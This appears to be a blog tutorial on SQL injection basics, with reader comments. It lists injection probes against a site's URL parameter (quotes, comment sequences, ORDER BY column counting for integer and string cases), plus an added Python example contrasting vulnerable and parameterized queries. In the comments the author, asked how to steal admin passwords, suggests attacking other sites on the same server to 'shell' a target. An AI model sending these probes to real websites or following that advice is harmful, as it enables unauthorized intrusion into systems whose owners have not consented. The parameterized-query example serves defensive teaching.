SQL Injection - Basics of SQLi Part 1 by RAi Jee
SQL (Structured Query Language) injection is one of the most powerful methods of system penetration.
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The attacker sends his own commands to the web application in order to dump the database.
So let's start!
First, check whether the target website is vulnerable to SQL injection. We mostly use a single quote ', e.g.
https://www.site.com/index.php?id=1'
And we get an error. It means the quote reached the SQL query unescaped, so the site is vulnerable to SQL injection.
Here are some other ways to check a website's vulnerability.
Using a closing bracket )
https://www.site.com/index.php?id=1)
Using a single quote '
https://www.site.com/index.php?id=1'
Using a double quote "
https://www.site.com/index.php?id=1"
The next step is to count the total number of columns.
First check which comment type balances our query.
Here are some basic comments (%23 is the URL-encoded #).
https://www.site.com/index.php?id=1--
https://www.site.com/index.php?id=1--+
https://www.site.com/index.php?id=1-- -
https://www.site.com/index.php?id=1--+-
https://www.site.com/index.php?id=1%23
https://www.site.com/index.php?id=1;
After balancing our query, let's count the total number of columns. We can count columns using an ORDER BY or GROUP BY statement.
https://www.site.com/index.php?id=1 order By 1--
No error.
https://www.site.com/index.php?id=1 order by 2--
No error.
https://www.site.com/index.php?id=1 order by 3--
No error.
https://www.site.com/index.php?id=1 order by 4--
We got an error.
Unknown column '4' in 'order clause'
It means the total number of columns is 3.
This is integer-based SQL injection.
But sometimes we are injecting a site, the column count is 1000, and still nothing shows, e.g.
https://www.site.com/index.php?id=1 order by 10000--
It means it is string-based SQL injection: the value sits inside quotes in the query, so our ORDER BY is treated as part of the string and never runs. Let's add a single quote ' to our query.
https://www.site.com/index.php?id=1' order by 10000--
And we got an error.
Unknown column '10000' in 'order clause'
https://www.site.com/index.php?id=1' order by 4--
Again an error. Unknown column '4' in 'order clause'
https://www.site.com/index.php?id=1' order by 3--
No error! The total number of columns is 3.
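Seen from the defender's side, the probes above only change the outcome because the id parameter is concatenated into the SQL text. The following is an added example, not code from the original post: it replays the tutorial's integer-based probes against a concatenated query, a parameterized query and a validated one. Assumptions: Python's sqlite3 stands in for the MySQL backend (so the error texts differ), and the news table and all function names are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data: a 3-column table, matching the count found above.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    db.execute("INSERT INTO news VALUES (1, 'hello', 'first post')")
    return db

def fetch_vulnerable(db, raw_id):
    # Integer-based injection point: the parameter is pasted into the SQL text,
    # so a quote, a comment or an ORDER BY clause becomes part of the statement.
    sql = "SELECT id, title, body FROM news WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def fetch_parameterized(db, raw_id):
    # Hardened: the value is bound as data and is never parsed as SQL.
    sql = "SELECT id, title, body FROM news WHERE id = ?"
    return db.execute(sql, (raw_id,)).fetchall()

def fetch_validated(db, raw_id):
    # Defence in depth: accept only a plain integer, then bind it.
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("id must be an integer")
    return fetch_parameterized(db, int(raw_id))

def outcome(fetch, db, raw_id):
    # Collapse each result to what the client could observe.
    try:
        return "rows=%d" % len(fetch(db, raw_id))
    except sqlite3.Error:
        return "sql-error"   # the observable error the tutorial relies on
    except ValueError:
        return "rejected"

# The id values used in the tutorial's URLs.
PROBES = ["1", "1'", "1 order by 3--", "1 order by 4--"]

def run_probes():
    db = make_db()
    handlers = (fetch_vulnerable, fetch_parameterized, fetch_validated)
    return {p: tuple(outcome(h, db, p) for h in handlers) for p in PROBES}

if __name__ == "__main__":
    for probe, results in run_probes().items():
        print("%-18r vulnerable=%s parameterized=%s validated=%s" % ((probe,) + results))
```

With the bound parameter every probe is just a non-matching value, so there is no error or behaviour difference left for the client to observe.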
In my next tutorials we will discuss finding vulnerable columns with different techniques, and WAF bypassing.
We will continue our tutorials.
Author: Rai Muzammal Hussain a.k.a. RAi Jee
Thanks for the lecture. How can I get the admin user name and password through SQL?
In this tutorial I have just discussed checking vulnerability, balancing our query and counting columns through different methods. In lectures I will discuss this part also.
I tried all the methods mentioned above to check if the site is vulnerable, but it shows "Server not found..check the address for typing errors blah blah.."
Now how do I deal with such sites??
Then in such a type of condition maybe the site is not vulnerable to SQL injection. If the server is important to you and you really want to shell it, then try to exploit other websites which are hosted on the same server.
Thanks for the tutorial. This tutorial is really helpful....